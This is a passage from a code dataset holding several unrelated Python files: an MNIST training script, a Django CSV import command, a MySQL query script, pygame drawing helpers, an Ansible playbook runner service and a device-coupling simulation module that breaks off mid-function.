np.where(y_train==1)\n\n_, M_test_label = np.where(y_test==1)\n\n\n# =============================================================================\n# plt.figure()\n# plt.title('Activation')\n# \n# vis_x = x_train[:, 0]\n# vis_y = x_train[:, 1]\n# plt.scatter(vis_x, vis_y, c=M_train_label, marker = '.', cmap=plt.cm.get_cmap(\"jet\", 10))\n# plt.colorbar(ticks=range(10))\n# plt.clim(-0.5, 9.5)\n# plt.show()\n# plt.title('Local Algorithm')\n# \n# plt.figure()\n# plt.title('Activation')\n# \n# vis_x = x_test[:, 0]\n# vis_y = x_test[:, 1]\n# plt.scatter(vis_x, vis_y, c=M_test_label, marker = '.', cmap=plt.cm.get_cmap(\"jet\", 10))\n# plt.colorbar(ticks=range(10))\n# plt.clim(-0.5, 9.5)\n# plt.show()\n# plt.title('Local Algorithm')\n# =============================================================================\n\n\n#%%\ntf.reset_default_graph()\n# Network Parameters\n\n\n\nnum_input = 1 # MNIST data input (img shape: 28*28)\n\nnum_hidden_1 = 1 # 1st layer num features\nnum_hidden_2 = 1 # 2nd layer num features (the latent dim)\nnum_hidden_3 = 1 \n\n\ntwin1_weights = {\n 'h1': tf.Variable(tf.random_normal([num_input, num_hidden_1],mean=0.0, stddev=0.1)),\n 'h2': tf.Variable(tf.random_normal([num_hidden_1, num_hidden_2],mean=0.0, stddev=0.1)),\n 'h3': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)), \n 'h4': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)), \n 'h5': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)), \n 'h_final': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)),\n\n}\n\n\ntwin2_weights = {\n 'h1': tf.Variable(tf.random_normal([num_input, num_hidden_1],mean=0.0, stddev=0.1)),\n 'h2': tf.Variable(tf.random_normal([num_hidden_1, num_hidden_2],mean=0.0, stddev=0.1)),\n 'h3': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)), \n 'h4': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)), \n 'h5': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)), \n 'h_final': tf.Variable(tf.random_normal([num_hidden_2, num_hidden_3],mean=0.0, stddev=0.1)),\n\n}\n\n\n\n# Building the encoder\ndef twin1(x):\n # Encoder Hidden layer with sigmoid activation #1\n layer_1 = tf.matmul(tf.pow(x,2),twin1_weights['h1'])/(1+tf.matmul(tf.pow(x,2),twin1_weights['h1']))\n # Encoder Hidden layer with sigmoid activation #2\n layer_2 = tf.matmul(tf.pow(x,2),twin1_weights['h2'])/(1+tf.matmul(tf.pow(x,2),twin1_weights['h2'])-layer_1)\n # Decoder Hidden layer with sigmoid activation #1\n layer_3 = tf.matmul(tf.pow(x,2),twin1_weights['h3'])/(1+tf.matmul(tf.pow(x,2),twin1_weights['h3'])-layer_2)\n \n layer_4 = tf.matmul(tf.pow(x,2),twin1_weights['h4'])/(1+tf.matmul(tf.pow(x,2),twin1_weights['h4'])-layer_3)\n \n# layer_5 = tf.matmul(tf.pow(x,2),twin1_weights['h5'])/(1+tf.matmul(tf.pow(x,2),twin1_weights['h5'])-layer_4)\n \n final = twin1_weights['h_final']/(1-layer_4)\n \n return final\n\ndef twin2(x):\n # Encoder Hidden layer with sigmoid activation #1\n layer_1 = tf.matmul(tf.pow(x,2),twin2_weights['h1'])/(1+tf.matmul(tf.pow(x,2),twin2_weights['h1']))\n # Encoder Hidden layer with sigmoid activation #2\n layer_2 = tf.matmul(tf.pow(x,2),twin2_weights['h2'])/(1+tf.matmul(tf.pow(x,2),twin2_weights['h2'])-layer_1)\n # Decoder Hidden layer with sigmoid activation #1\n layer_3 = tf.matmul(tf.pow(x,2),twin2_weights['h3'])/(1+tf.matmul(tf.pow(x,2),twin2_weights['h3'])-layer_2)\n\n layer_4 = tf.matmul(tf.pow(x,2),twin2_weights['h4'])/(1+tf.matmul(tf.pow(x,2),twin2_weights['h4'])-layer_3)\n\n# layer_5 = tf.matmul(tf.pow(x,2),twin2_weights['h5'])/(1+tf.matmul(tf.pow(x,2),twin2_weights['h5'])-layer_4)\n \n final = twin2_weights['h_final']*x/(1-layer_4)\n \n return final\n\n\n\n# Training Parameters\nlearning_rate = 0.002\nnum_steps = 10000\n\n\n\n# Construct model\nX = tf.placeholder(tf.float32, shape = (None, 2))\ny = tf.placeholder(tf.float32, shape = (None, 10))\n \n\nencoder_1 = twin1(X[:,0:1])\nencoder_2 = twin2(X[:,1:2])\n\nfeature = tf.concat([encoder_1, encoder_2], axis = 1)\n\n#feature = X\n\n\nFC1_weights = tf.get_variable('W1', dtype=tf.float32, shape=[2,300], initializer=tf.truncated_normal_initializer(stddev=0.01))\nFC1_biases = tf.get_variable('b1', dtype=tf.float32, shape = [300], initializer=tf.truncated_normal_initializer(stddev=0.01))\n\nFC2_weights = tf.get_variable('W2', dtype=tf.float32, shape=[300,200], initializer=tf.truncated_normal_initializer(stddev=0.01))\nFC2_biases = tf.get_variable('b2', dtype=tf.float32, shape = [200], initializer=tf.truncated_normal_initializer(stddev=0.01))\n\nFC3_weights = tf.get_variable('W3', dtype=tf.float32, shape=[200,10], initializer=tf.truncated_normal_initializer(stddev=0.01))\nFC3_biases = tf.get_variable('b3', dtype=tf.float32, shape = [10], initializer=tf.truncated_normal_initializer(stddev=0.01))\n\n\nFC_layer1 = tf.nn.relu(tf.matmul(feature, FC1_weights) + FC1_biases)\n\nFC_layer2 = tf.nn.relu(tf.matmul(FC_layer1, FC2_weights) + FC2_biases)\n\noutput_logits = tf.matmul(FC_layer2, FC3_weights) + FC3_biases\n\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=output_logits), name='loss')\noptimizer = tf.train.AdamOptimizer(learning_rate = 0.002, name='Adam-op').minimize(loss)\ncorrect_prediction = tf.equal(tf.argmax(output_logits, 1), tf.argmax(y, 1), name='correct_pred')\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name='accuracy')\n\n# Model predictions\ncls_prediction = tf.argmax(output_logits, axis=1, name='predictions')\n\ninit = tf. global_variables_initializer()\nbatch_size = 1000\nepochs = 100\ntrain_accuracy = np.zeros((1,epochs))\n# Create an interactive session (to keep the session in the other cells)\nsess = tf.InteractiveSession()\n# Initialize all variables\nsess.run(init)\n# Number of training iterations in each epoch\nnum_tr_iter = int(len(y_train) / batch_size)\nfor epoch in range(epochs):\n print('Training epoch: {}'.format(epoch + 1))\n # Randomly shuffle the training data at the beginning of each epoch \n\n index = [i for i in range(55000)] \n np.random.shuffle(index) \n x_train = x_train[index]\n y_train = y_train[index]\n \n\n \n for iteration in range(num_tr_iter):\n\n\n x_batch = x_train[batch_size*iteration:batch_size*(iteration+1)]\n y_batch = y_train[batch_size*iteration:batch_size*(iteration+1)] \n # Run optimization op (backprop)\n\n sess.run(optimizer, feed_dict={X: x_batch, y: y_batch})\n\n if iteration % 2 == 0:\n # Calculate and display the batch loss and accuracy\n loss_batch, acc_batch = sess.run([loss, accuracy],\n feed_dict={X: x_batch, y: y_batch})\n\n print(\"iter {0:3d}:\\t Loss={1:.2f},\\tTraining Accuracy={2:.01%}\".\n format(iteration, loss_batch, acc_batch))\n \n train_accuracy[0,epoch] = sess.run(accuracy, feed_dict = {X: x_train, y: y_train})\n print(train_accuracy[0,epoch])\n \n \n \n\nprint(sess.run(accuracy, feed_dict = {X: x_test, y: y_test}))\n\n\n\n#%%\nplt.figure()\nplt.plot(np.arange(epochs), train_accuracy[0,:])\n\n","sub_path":"Robustness/MNIST_QuadraticTrain_deep.py","file_name":"MNIST_QuadraticTrain_deep.py","file_ext":"py","file_size_in_byte":7789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"583588000","text":"\"\"\"Import voting statements from a CSV file.\"\"\"\n\nimport csv\nimport datetime\n\nfrom django.core.management.base import BaseCommand\nfrom django.utils.text import slugify\n\nfrom ...models import Statement\n\n\nclass Command(BaseCommand):\n \"\"\"Import voting statements from a CSV file.\"\"\"\n help = \"Import voting statements from a CSV file.\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"filename\")\n\n def handle(self, *args, **options):\n imported = 0\n with open(options[\"filename\"], encoding=\"ascii\",\n newline=\"\") as csvfile:\n for row in csv.reader(csvfile):\n title, release_date, msgid = row[1:]\n release_date = datetime.datetime.strptime(\n release_date, \"%Y-%m-%d\").date()\n if Statement.objects.filter(\n release_date=release_date, title=title):\n continue\n Statement(\n title=title,\n slug=slugify(title),\n release_date=release_date,\n msgid=msgid,\n statement=\"\",\n ).save()\n imported += 1\n self.stdout.write(self.style.SUCCESS(\n \"Imported {} statement(s)\".format(imported)\n ))\n","sub_path":"voting/management/commands/importvotingstatements.py","file_name":"importvotingstatements.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"350669002","text":"import pymysql.cursors\n\n# 连接数据库\nconnect = pymysql.Connect(\n host='localhost',\n port=3310,\n user='root',\n passwd='root',\n db='supershop',\n charset='utf8'\n)\n\n# 获取游标\ncursor = connect.cursor()\n\n# 查询数据\nsql = \"\"\"\nSELECT time,COUNT(time) count FROM\n(SELECT SUBSTRING(startDate,12,2) time FROM `sp_order` AS o) AS t\nGROUP BY time\nORDER BY count desc;\n\"\"\"\n# data = ('13512345678',)\ncursor.execute(sql)\nfor row in cursor.fetchall():\n print(\"Name:%s\\tSaving:%.2f\" % row)\nprint('共查找出', cursor.rowcount, '条数据')\n\n#or.rowcount)\n\n# 关闭连接\ncursor.close()\nconnect.close()\n","sub_path":"sellHotTime.py","file_name":"sellHotTime.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"475966301","text":"import pygame\nfrom pygame.gfxdraw import aacircle\nfrom pygame.draw import polygon\nimport numpy as np\n\ndef draw_filled_aacircle(screen, radius, color, xpos, ypos):\n pygame.gfxdraw.filled_circle(screen,\n int(xpos),\n int(ypos),\n int(radius),\n color)\n pygame.gfxdraw.aacircle(screen,\n int(xpos),\n int(ypos),\n int(radius),\n color)\n\ndef draw_center_rect(screen, width, height, color, xpos, ypos):\n rect = pygame.Rect(xpos-0.5*width,\n ypos-0.5*height,\n width,\n height)\n pygame.draw.rect(screen, color, rect) \n\ndef draw_bottom_rect(screen, width, height, color, xpos, ypos):\n rect = pygame.Rect(xpos-0.5*width,\n ypos,\n width,\n height)\n rect.bottom = ypos\n pygame.draw.rect(screen, color, rect) \n\n\ndef draw_msg(screen, text, color=(255,255,255),\n loc='center', pos=(1024/2,768/2), size=50,\n font='freesansbold.ttf'):\n font = pygame.font.Font(font, size)\n text_surf, text_rect = make_text(text, font, color)\n if loc == 'center':\n text_rect.center = pos\n elif loc == 'left':\n text_rect.center = pos\n text_rect.left = pos[0]\n elif loc == 'right':\n text_rect.center = pos\n text_rect.right = pos[0]\n screen.blit(text_surf, text_rect)\n\ndef make_text(text, font, color):\n text_surface = font.render(text, True, color)\n return text_surface, text_surface.get_rect()\n\ndef draw_info_rect(screen, text, text_color,\n bg_color, border_color,\n width, height, xpos, ypos,\n padding_size=4, border_size=4):\n PADDING_SIZE = padding_size\n BORDER_SIZE = border_size\n BORDER_SIZE = PADDING_SIZE + BORDER_SIZE\n # draw border\n draw_center_rect(screen, width+BORDER_SIZE,\n height+BORDER_SIZE, border_color,\n xpos, ypos)\n # draw background\n draw_center_rect(screen, width+PADDING_SIZE,\n height+PADDING_SIZE, bg_color,\n xpos, ypos)\n # draw message\n draw_msg(screen, text, text_color,\n pos=(xpos-0.5*width+PADDING_SIZE,ypos),\n size=height, loc='left')\n\ndef draw_fixation(game, xpos, color=(255,255,255)):\n draw_msg(game.screen, '+', color=color,\n loc='center',\n pos=(xpos,\n .5*game.SCREEN_HEIGHT+game.FIXATION_OFFSET),\n size=130)\n\ndef draw_keyboard(game):\n for key in range(5):\n if game.keydown[key]:\n color = game.ACTIVE_COLOR\n else:\n color = game.PASSIVE_COLOR\n draw_center_rect(game.screen,\n game.KEY_WIDTH,\n game.KEY_HEIGHT,\n color,\n .5*game.SCREEN_WIDTH+game.KEY_XPOS*(key-2),\n game.KEY_YPOS)\n if (game.current_key != 'none'\n and game.current_key != game.last_key):\n draw_filled_aacircle(game.screen, .5*game.KEY_WIDTH,\n game.ACTIVE_COLOR,\n .5*game.SCREEN_WIDTH+game.KEY_XPOS*(game.current_key-3),\n .5*game.KEY_YPOS)\n game.potential_last_key = game.current_key\n else:\n game.last_key = game.potential_last_key\n\ndef draw_cue(game):\n for key in range(len(game.current_sequence)):\n draw_msg(game.screen, str(game.current_sequence[key]),\n color=(255,255,255),\n loc='center',\n pos=(.5*game.SCREEN_WIDTH+game.KEY_XPOS*(key-2),\n .5*game.SCREEN_HEIGHT+game.NUMBER_OFFSET),\n size=125)\n\ndef draw_sequence_progress(game):\n draw_fixation(game, xpos=.5*game.SCREEN_WIDTH, color=game.FIXATION_COLOR)\n # star for each press\n # goes green if correct, red if wrong, grey otherwise\n for key in range(len(game.current_sequence)):\n if game.sequence_progress[key] == 'unpressed':\n color = game.PASSIVE_COLOR\n elif game.sequence_progress[key] == 'correct':\n color = game.ACTIVE_COLOR\n elif game.sequence_progress[key] == 'wrong':\n color = game.WRONG_COLOR\n else:\n color = (0,0,0) # silly base case\n # check draw_keyboard for specific positionings\n draw_msg(game.screen, '*', color=color,\n loc='center',\n pos=(.5*game.SCREEN_WIDTH+game.KEY_XPOS*(key-2),\n .5*game.SCREEN_HEIGHT+game.STAR_OFFSET-game.SEQUENCE_PROGRESS_OFFSET),\n size=150)\n\ndef draw_frame_rectangle(game):\n draw_center_rect(game.screen,\n width=.5*game.KEY_WIDTH+5*game.KEY_XPOS+2*game.FRAME_RECT_BORDER_WIDTH,\n height=game.FRAME_HEIGHT+2*game.FRAME_RECT_BORDER_WIDTH,\n color=game.PASSIVE_COLOR,\n xpos=.5*game.SCREEN_WIDTH,\n ypos=.5*game.SCREEN_HEIGHT)\n draw_center_rect(game.screen,\n width=.5*game.KEY_WIDTH+5*game.KEY_XPOS,\n height=game.FRAME_HEIGHT,\n color=game.BG_COLOR,\n xpos=.5*game.SCREEN_WIDTH,\n ypos=.5*game.SCREEN_HEIGHT)\n\ndef draw_tutorial_messages(game, shade, stage):\n text_shade = min(255,int(255-(255-game.BG_COLOR[0])*shade))\n msg_height = .05*game.SCREEN_HEIGHT\n for msg in range(len(game.TUTORIAL_MESSAGES[stage])):\n draw_msg(game.screen, game.TUTORIAL_MESSAGES[stage][msg],\n color=(text_shade,text_shade,text_shade),\n loc='center', pos=(.5*game.SCREEN_WIDTH,.7*game.SCREEN_HEIGHT+msg*msg_height), size=24,\n font='freesansbold.ttf')\n\ndef draw_tutorial_keyboard(game, xpos, ypos, scale):\n for key in range(5):\n if game.keydown[key]:\n color = game.ACTIVE_COLOR\n game.tutorial_each_key[key] = True\n else:\n color = game.PASSIVE_COLOR\n draw_center_rect(game.screen,\n scale*game.KEY_WIDTH,\n scale*game.KEY_HEIGHT,\n color,\n .5*game.SCREEN_WIDTH+scale*game.KEY_XPOS*(key-2)+xpos,\n game.KEY_YPOS+ypos)\n if not(game.tutorial_each_key[key]):\n color = game.PASSIVE_COLOR\n else:\n color = (255,255,255)\n draw_msg(game.screen, str(key+1),\n color=color,\n loc='center',\n pos=(.5*game.SCREEN_WIDTH+scale*game.KEY_XPOS*(key-2)+xpos,\n (.25+.26*(1-scale))*game.SCREEN_HEIGHT+ypos),\n size=int(scale*125))\n\ndef draw_tutorial_rect(game, shade, xpos, ypos, scale):\n rect_shade = min(game.PASSIVE_COLOR[0],int(game.PASSIVE_COLOR[0]-(game.PASSIVE_COLOR[0]-game.BG_COLOR[0])*shade))\n draw_center_rect(game.screen,\n width=scale*(.5*game.KEY_WIDTH+5*game.KEY_XPOS+2*game.FRAME_RECT_BORDER_WIDTH),\n height=scale*(game.FRAME_HEIGHT+2*game.FRAME_RECT_BORDER_WIDTH),\n color=(rect_shade,rect_shade,rect_shade),\n xpos=.5*game.SCREEN_WIDTH+xpos,\n ypos=.5*game.SCREEN_HEIGHT+ypos)\n draw_center_rect(game.screen,\n width=scale*(.5*game.KEY_WIDTH+5*game.KEY_XPOS),\n height=scale*(game.FRAME_HEIGHT),\n color=game.BG_COLOR,\n xpos=.5*game.SCREEN_WIDTH+xpos,\n ypos=.5*game.SCREEN_HEIGHT+ypos)\n\ndef draw_tutorial_cue(game, shade, xpos, ypos, scale): \n draw_tutorial_rect(game, shade, xpos, ypos, scale)\n text_shade = min(255,int(255-(255-game.BG_COLOR[0])*shade))\n for key in range(len(game.current_sequence)):\n draw_msg(game.screen, str(game.current_sequence[key]),\n color=(text_shade,text_shade,text_shade),\n loc='center',\n pos=(.5*game.SCREEN_WIDTH+scale*game.KEY_XPOS*(key-2)+xpos,\n .5*game.SCREEN_HEIGHT+ypos),\n size=int(scale*125))\n\ndef draw_tutorial_sequence_progress(game, shade):\n fixation_shade = min(game.FIXATION_COLOR[0],int(game.FIXATION_COLOR[0]-(game.FIXATION_COLOR[0]-game.BG_COLOR[0])*shade))\n draw_fixation(game, xpos=.5*game.SCREEN_WIDTH, color=(fixation_shade,fixation_shade,fixation_shade))\n for key in range(len(game.current_sequence)):\n if shade > 0:\n cue_shade = min(game.PASSIVE_COLOR[0],int(game.PASSIVE_COLOR[0]-(game.PASSIVE_COLOR[0]-game.BG_COLOR[0])*shade))\n color = (cue_shade,cue_shade,cue_shade)\n elif game.sequence_progress[key] == 'unpressed':\n color = game.PASSIVE_COLOR\n elif game.sequence_progress[key] == 'correct':\n color = game.ACTIVE_COLOR\n elif game.sequence_progress[key] == 'wrong':\n color = game.WRONG_COLOR\n else:\n color = (0,0,0) # silly base case\n draw_msg(game.screen, '*', color=color,\n loc='center',\n pos=(.5*game.SCREEN_WIDTH+game.KEY_XPOS*(key-2),\n .5*game.SCREEN_HEIGHT+game.STAR_OFFSET-game.SEQUENCE_PROGRESS_OFFSET),\n size=150)\n\ndef draw_tutorial_sequence_score(game, shade, condition, scale, ypos, points_bool=False):\n draw_tutorial_rect(game, shade, 0, ypos, scale)\n if condition == 'fast':\n base_color = game.ACTIVE_COLOR\n points_msg = '+3 points'\n points_meaning = 'fast'\n elif condition == 'correct':\n base_color = game.ACTIVE_COLOR\n points_msg = '+1 point'\n points_meaning = 'correct'\n elif condition == 'slow':\n base_color = game.SLOW_COLOR\n points_msg = ' 0 points'\n points_meaning = 'slow'\n elif condition == 'incorrect':\n base_color = game.WRONG_COLOR\n points_msg = '-1 point'\n points_meaning = 'incorrect'\n r_color = base_color[0]-shade*(base_color[0]-game.BG_COLOR[0])\n g_color = base_color[1]-shade*(base_color[1]-game.BG_COLOR[0])\n b_color = base_color[2]-shade*(base_color[2]-game.BG_COLOR[0])\n fixation_color = (r_color,g_color,b_color)\n draw_tutorial_fixation(game, xpos=0, ypos=ypos, scale=scale, color=fixation_color)\n if condition == 'fast':\n draw_tutorial_fixation(game, xpos=scale*game.KEY_XPOS, ypos=ypos, scale=scale, color=fixation_color)\n draw_tutorial_fixation(game, xpos=-scale*game.KEY_XPOS, ypos=ypos, scale=scale, color=fixation_color)\n msg_shade = min(game.FIXATION_COLOR[0],int(game.FIXATION_COLOR[0]-(game.FIXATION_COLOR[0]-game.BG_COLOR[0])*shade))\n if points_bool:\n draw_msg(game.screen, points_msg, color=(msg_shade,msg_shade,msg_shade),\n loc='left',\n pos=(.675*game.SCREEN_WIDTH,\n .5*game.SCREEN_HEIGHT+ypos),\n size=35)\n draw_msg(game.screen, points_meaning, color=(msg_shade,msg_shade,msg_shade),\n loc='right',\n pos=(.325*game.SCREEN_WIDTH,\n .5*game.SCREEN_HEIGHT+ypos),\n size=35)\n\n\ndef draw_tutorial_fixation(game,xpos,ypos,scale,color):\n draw_msg(game.screen, '+', color=color,\n loc='center',\n pos=(.5*game.SCREEN_WIDTH+xpos,\n .5*game.SCREEN_HEIGHT+ypos+scale*game.FIXATION_OFFSET),\n size=int(scale*130))\n\n","sub_path":"game_graphics.py","file_name":"game_graphics.py","file_ext":"py","file_size_in_byte":11557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"272230376","text":"\nimport os\nimport glob\nimport json\nimport uuid\nimport threading\nimport time\n\nfrom ansible_runner import run_async\nfrom runner_service import configuration\nfrom .utils import fread\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef get_status(play_uuid):\n\n pb_artifacts = os.path.join(configuration.settings.playbooks_root_dir,\n \"artifacts\",\n play_uuid)\n\n if not os.path.exists(pb_artifacts):\n return None\n\n pb_status = os.path.join(pb_artifacts,\n \"status\")\n\n if os.path.exists(pb_status):\n return {\"status\": fread(pb_status)}\n else:\n # get last event\n events_dir = os.path.join(pb_artifacts, \"job_events\")\n events = os.listdir(events_dir)\n events.sort(key=lambda filenm: int(filenm.split(\"-\", 1)[0]))\n last_event = events[-1]\n last_event_data = json.loads(fread(os.path.join(events_dir,\n last_event)))\n print(last_event_data)\n return {\"status\": \"running\",\n \"task_id\": last_event_data.get('counter'),\n \"task_name\": last_event_data['event_data'].get('task')}\n\n\ndef list_playbooks():\n\n pb_dir = os.path.join(configuration.settings.playbooks_root_dir,\n \"project\")\n playbook_names = [os.path.basename(pb_path) for pb_path in\n glob.glob(os.path.join(pb_dir,\n \"*.yml\"))]\n\n return playbook_names\n\n\ndef stop_playbook(play_uuid):\n return\n\n\ndef start_playbook(playbook_name, vars):\n \"\"\" Initiate a playbook run \"\"\"\n\n play_uuid = str(uuid.uuid1())\n\n settings = {\"suppress_ansible_output\": True}\n\n # this should just be run_async, using 'run' hangs the root logger output\n # even when backgrounded\n if vars:\n _thread, _runner = run_async(private_data_dir=configuration.settings.playbooks_root_dir,\n settings=settings,\n # envvars=envvars,\n quiet=False,\n ident=play_uuid,\n extravars=vars,\n # inventory='localhost',\n playbook=playbook_name)\n else:\n _thread, _runner = run_async(private_data_dir=configuration.settings.playbooks_root_dir,\n settings=settings,\n # envvars=envvars,\n quiet=False,\n ident=play_uuid,\n # inventory='localhost',\n playbook=playbook_name)\n\n # Workaround for ansible_runner logging, resetting the rootlogger level\n root_logger = logging.getLogger()\n root_logger.setLevel(10)\n\n delay = 0.1\n timeout = 5 / delay\n ctr = 0\n\n # Wait for the play to actually start, but apply a timeout\n while _runner.status.lower() == 'unstarted':\n time.sleep(delay)\n ctr += 1\n if ctr > timeout:\n return play_uuid, \"timeout\"\n\n # Start a watcher, so the termination of the playbook can be recorded in\n # the log file\n _t = threading.Thread(target=watcher, args=(_thread, _runner))\n _t.daemon = True\n _t.name = \"watcher\"\n _t.start()\n\n return play_uuid, _runner.status\n\n\ndef watcher(pb_thread, pb_runner):\n \"\"\"\n Use a watcher thread to wait for a given playbook execution thread to\n terminate\n \"\"\"\n\n pb_thread.join()\n logger.info(\"Playbook {}, UUID={} ended, \"\n \"status={}\".format(pb_runner.config.playbook,\n pb_runner.config.ident,\n pb_runner.status))\n","sub_path":"runner_service/services/playbook.py","file_name":"playbook.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"60420462","text":"import os\nimport sys\n\n__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\nmodule_path = os.path.join(__location__, \"..\", \"..\", \"..\")\nsys.path.append(module_path)\n\nimport glob\nimport numpy\nimport logging\nfrom mock import MagicMock\nfrom itertools import cycle\nimport tsfresh.feature_extraction\nfrom twisted.internet import reactor\nfrom utils.serializer import DillSerializer\nfrom coupling.utils.misc import create_random_mac\nfrom coupling.utils.access_point import AccessPoint\nfrom coupling.utils.coupling_data import StaticCouplingResult\nimport coupling.light_grouping_pattern.light_analysis as light_analysis\nimport coupling.localization.localization_server as localization_server\nfrom coupling.device_grouping.online.machine_learning_features import Classifier\nfrom coupling.device_grouping.online.static.coupling_server import ServerController\nfrom coupling.device_grouping.online.static.coupling_client import ClientController\nfrom coupling.device_grouping.online.machine_learning_features import BasicFeatures\nfrom coupling.device_grouping.online.machine_learning_features import TsFreshFeatures\nimport coupling.device_grouping.online.coupling_static_simulator as coupling_simulator\nfrom coupling.device_grouping.online.static.coupling_data_provider import CouplingDataProvider\n\n# global data\nclients = list()\nmac_mapping = dict()\n\nclass SimulationData:\n \n def __init__(self, server_ip, server_port, num_clients, num_reject_clients, len_light_pattern,\n data_period_coupling, coupling_compare_method, coupling_similarity_threshold, equalize_method,\n data_period_ml_train, path_ml_train_data, coupling_ml_classifier,\n data_period_localization, localization_pos_in_area, path_wifi_scans, path_ble_scans, rounds=0):\n \n self.server_ip = server_ip\n self.server_port = int(server_port)\n self.num_clients = int(num_clients)\n self.num_reject_clients = int(num_reject_clients)\n self.len_light_pattern = int(len_light_pattern)\n self.light_signal, self.light_signal_time = light_analysis.load_light_pattern(self.len_light_pattern)\n \n self.data_period_coupling = float(data_period_coupling)\n self.str_coupling_compare_method = coupling_compare_method\n self.coupling_compare_method = coupling_simulator.coupling_compare_methods[self.str_coupling_compare_method]\n \n self.coupling_similarity_threshold = float(coupling_similarity_threshold)\n self.str_equalize_method = equalize_method\n self.equalize_method = coupling_simulator.equalize_methods[self.str_equalize_method]\n \n self.data_period_ml_train = float(data_period_ml_train)\n combined_raw_feature_data = glob.glob(os.path.join(path_ml_train_data, \"combined-*-raw-feature-data\"))[0]\n combined_raw_feature_data = DillSerializer(combined_raw_feature_data).deserialize()\n X_basic = combined_raw_feature_data[self.data_period_ml_train][rounds].X_basic\n y_basic = combined_raw_feature_data[self.data_period_ml_train][rounds].y_basic\n X_basic_all_features, X_basic_selected_features = self.process_ml_features(\n X_basic, y_basic, \"basic-features\", self.data_period_ml_train)\n assert len(X_basic_all_features) == len(y_basic)\n assert len(X_basic_selected_features) == len(y_basic)\n \n X_tsfresh = combined_raw_feature_data[self.data_period_ml_train][rounds].X_tsfresh\n y_tsfresh = combined_raw_feature_data[self.data_period_ml_train][rounds].y_tsfresh\n tsfresh_features_to_extract_selected = os.path.join(__location__, \"..\", \"tsfresh-features-to-be-extracted\")\n self.tsfresh_features_to_extract_selected = DillSerializer(tsfresh_features_to_extract_selected).deserialize()\n X_tsfresh_all_features, X_tsfresh_selected_features = self.process_ml_features(\n X_tsfresh, y_tsfresh, \"tsfresh-features\", self.data_period_ml_train, self.tsfresh_features_to_extract_selected)\n self.tsfresh_features_to_extract_all = tsfresh.feature_extraction.settings.from_columns(X_tsfresh_all_features)\n assert len(X_tsfresh_all_features) == len(y_tsfresh)\n assert len(X_tsfresh_selected_features) == len(y_tsfresh)\n \n self.str_coupling_ml_classifier = coupling_ml_classifier\n clf_type = coupling_simulator.coupling_ml_classifiers[self.str_coupling_ml_classifier]\n \n self.coupling_classifier_basic_all_features = Classifier.get_clf(clf_type)\n self.coupling_classifier_basic_all_features = self.coupling_classifier_basic_all_features.fit(\n X_basic_all_features, y_basic)\n self.coupling_classifier_basic_selected_features = Classifier.get_clf(clf_type)\n self.coupling_classifier_basic_selected_features = self.coupling_classifier_basic_selected_features.fit(\n X_basic_selected_features, y_basic)\n logging.info(\"basic all features shape: \" + str(X_basic_all_features.shape))\n logging.info(\"basic selected features shape: \" + str(X_basic_selected_features.shape))\n logging.info(\"truth shape: \" + str(y_basic.shape))\n \n self.coupling_classifier_tsfresh_all_features = Classifier.get_clf(clf_type)\n self.coupling_classifier_tsfresh_all_features = self.coupling_classifier_tsfresh_all_features.fit(\n X_tsfresh_all_features, y_tsfresh)\n self.coupling_classifier_tsfresh_selected_features = Classifier.get_clf(clf_type)\n self.coupling_classifier_tsfresh_selected_features = self.coupling_classifier_tsfresh_selected_features.fit(\n X_tsfresh_selected_features, y_tsfresh)\n logging.info(\"tsfresh all features shape: \" + str(X_tsfresh_all_features.shape))\n logging.info(\"tsfresh selected features shape: \" + str(X_tsfresh_selected_features.shape))\n logging.info(\"truth shape: \" + str(y_tsfresh.shape))\n \n self.data_period_localization = float(data_period_localization)\n self.localization_pos_in_area = map(int, localization_pos_in_area.strip('[]').split(','))\n self.wifi_scans = localization_server.load_data(path_wifi_scans)\n self.ble_scans = localization_server.load_data(path_ble_scans)\n self.path_wifi_scans = path_wifi_scans\n self.path_ble_scans = path_ble_scans\n self.localization_pos_out_area = [pos for pos in self.wifi_scans.keys() if pos not in self.localization_pos_in_area]\n \n def process_ml_features(self, X, y, filename, data_period_ml_train, tsfresh_features_to_extract_selected=None):\n logging.info(\"process ml features: \" + filename)\n data_exists = False\n file_exists = os.path.isfile(os.path.join(__location__, filename))\n if file_exists:\n X_features = DillSerializer(os.path.join(__location__, filename)).deserialize()\n if data_period_ml_train in X_features:\n X_all_features = X_features[data_period_ml_train][0]\n X_selected_features = X_features[data_period_ml_train][1]\n data_exists = True\n if not data_exists:\n if tsfresh_features_to_extract_selected:\n tsfresh_features = TsFreshFeatures()\n X_all_features = tsfresh_features.extract(X, y)\n X_selected_features = tsfresh_features.extract_selected_features(\n X, tsfresh_features_to_extract_selected)\n else:\n basic_features = BasicFeatures()\n X_all_features = basic_features.extract(X)\n X_selected_features = basic_features.extract_selected_features(X)\n if not file_exists:\n X_features = {data_period_ml_train: (X_all_features, X_selected_features)}\n else:\n X_features[data_period_ml_train] = (X_all_features, X_selected_features)\n DillSerializer(os.path.join(__location__, filename)).serialize(X_features)\n return X_all_features, X_selected_features\n\ndef evaluate_callback(accept_clients, 